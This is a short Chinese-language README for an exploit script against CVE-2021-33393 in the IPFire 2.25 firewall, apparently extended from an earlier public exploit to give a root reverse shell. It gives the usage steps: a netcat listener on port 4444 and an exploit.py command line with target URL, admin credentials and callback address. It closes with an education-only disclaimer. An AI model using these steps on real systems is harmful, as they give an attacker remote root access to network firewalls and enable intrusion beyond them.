此漏洞利用基于CVE-2021-33393(https://nvd.nist.gov/vuln/detail/CVE-2021-33393),并基于Mücahit Saratar(https://github.com/KaanaryOverFlow/ipfire-2-25-auth-rce)的原始漏洞利用构建,扩展了它以实现具有root权限的反向shell。
启动监听器:
nc -lvnp 4444
运行漏洞利用程序:
python exploit.py https://192.168.0.10:444 admin 'admin@123' 192.168.0.11:4444
此漏洞利用仅用于教育目的和授权的渗透测试。 请勿将其用于未经明确许可进行测试的系统。 作者不对滥用行为负责。